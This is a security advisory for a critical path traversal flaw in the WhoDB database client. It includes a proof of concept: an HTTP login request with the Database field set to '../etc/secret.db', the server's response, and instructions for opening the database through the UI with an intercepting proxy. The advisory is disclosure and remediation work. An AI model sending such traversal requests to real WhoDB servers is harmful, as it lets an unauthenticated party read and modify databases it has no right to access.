GHSA-9r4c-jwx3-3j76

Suggest an improvement
Source
https://github.com/advisories/GHSA-9r4c-jwx3-3j76
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-9r4c-jwx3-3j76/GHSA-9r4c-jwx3-3j76.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-9r4c-jwx3-3j76
Aliases
Published
2025-02-06T19:58:24Z
Modified
2025-02-07T23:26:46.841649Z
Severity
  • 10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N CVSS Calculator
Summary
WhoDB has a path traversal opening Sqlite3 database
Details

Summary

While the application only displays Sqlite3 databases present in the directory /db, there is no path traversal prevention in place. This allows an unauthenticated attacker to open any Sqlite3 database present on the host machine that the application is running on.

Details

WhoDB allows users to connect to Sqlite3 databases. By default, the databases must be present in /db/ (or alternatively ./tmp/ if development mode is enabled). Source: https://github.com/clidey/whodb/blob/ba6eb81d0ca40baead74bca58b2567166999d6a6/core/src/plugins/sqlite3/db.go#L14-L20

If no databases are present in the default directory, the UI indicates that the user is unable to open any databases:

2025-01-22-12-12-42

The database file is an user-controlled value. This value is used in .Join() with the default directory, in order to get the full path of the database file to open. Source: https://github.com/clidey/whodb/blob/ba6eb81d0ca40baead74bca58b2567166999d6a6/core/src/plugins/sqlite3/db.go#L26

No checks are performed whether the database file that is eventually opened actually resides in the default directory /db.

This allows an attacker to use path traversal (../../) in order to open any Sqlite3 database present on the system.

PoC

Before running the container, an example Sqlite3 database with dummy "secret" data was created:

DB_FILE=$(mktemp)
echo "CREATE TABLE secret_table (data TEXT); INSERT INTO secret_table VALUES ('secret data')" | sqlite3 "$DB_FILE"

The container was then created with nothing mounted into /db, and the dummy database mounted into /etc/secret.db:

podman run -d -p 8080:8080 -v "$DB_FILE":/etc/secret.db docker.io/clidey/whodb

The attacker sends a HTTP request to determine whether the secret.db is accessible by setting the Database value to ../etc/secret.db:

POST /api/query HTTP/1.1
Host: localhost:8080
content-type: application/json
...

{"operationName":"Login","variables":{"credentials":{"Type":"Sqlite3","Hostname":"","Database":"../etc/secret.db","Username":"","Password":"","Advanced":[]}},"query":"mutation Login($credentials: LoginCredentials!) {\n  Login(credentials: $credentials) {\n    Status\n    __typename\n  }\n}"}

The server response indicates that the database was successfully opened:

HTTP/1.1 200 OK
Content-Type: application/json
Set-Cookie: Token=eyJUeXBlIjoiU3FsaXRlMyIsIkhvc3RuYW1lIjoiIiwiVXNlcm5hbWUiOiIiLCJQYXNzd29yZCI6IiIsIkRhdGFiYXNlIjoiLi4vZXRjL3NlY3JldC5kYiJ9; Path=/; Expires=Thu, 23 Jan 2025 10:35:43 GMT; HttpOnly
...

{"data":{"Login":{"Status":true,"__typename":"StatusResponse"}}}

The Set-Cookie Token value is simply a Base64-encoded string with a JSON payload containing the connection details:

{
  "Type": "Sqlite3",
  "Hostname": "",
  "Username": "",
  "Password": "",
  "Database": "../etc/secret.db"
}

The attacker may set this cookie in the browser manually (alongside corresponding profiles in Local Storage) in order to open this database in the WhoDB application graphically. An easy way to perform this is by using a HTTP proxy such as Burp Suite, intercepting the login request and swapping the Database value to ../etc/secret.db.

Doing so, the attacker can then browse the database, its tables and the data within:

2025-01-22-12-36-25

The attacker may also insert or modify data using either the buttons presented in the UI or the Scratchpad functionality. In this proof-of-concept, the attacker inserts a new row using the Add Row button:

2025-01-22-12-36-49

Impact

Allows an unauthenticated attacker to open and read any Sqlite3 databases present on the system WhoDB is running on. If WhoDB has write permissions for the database file, the attacker is also able to modify the opened database.

The attacker is unable to create new databases; however, files which already exist but have no content (0-length files) may be opened and modified as fresh databases.

Recommendations

Before attempting to open the database, resolve and normalize the path to the database and check whether it is in the default directory. If not, present the user with an error.

Database specific
{
    "nvd_published_at": "2025-02-06T19:15:20Z",
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-06T19:58:24Z",
    "severity": "CRITICAL",
    "cwe_ids": [
        "CWE-22"
    ]
}
References

Affected packages

Go / github.com/clidey/whodb/core

Package

Name
github.com/clidey/whodb/core
View open source insights on deps.dev
Purl
pkg:golang/github.com/clidey/whodb/core

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.0.0-20250127172032-547336ac73c8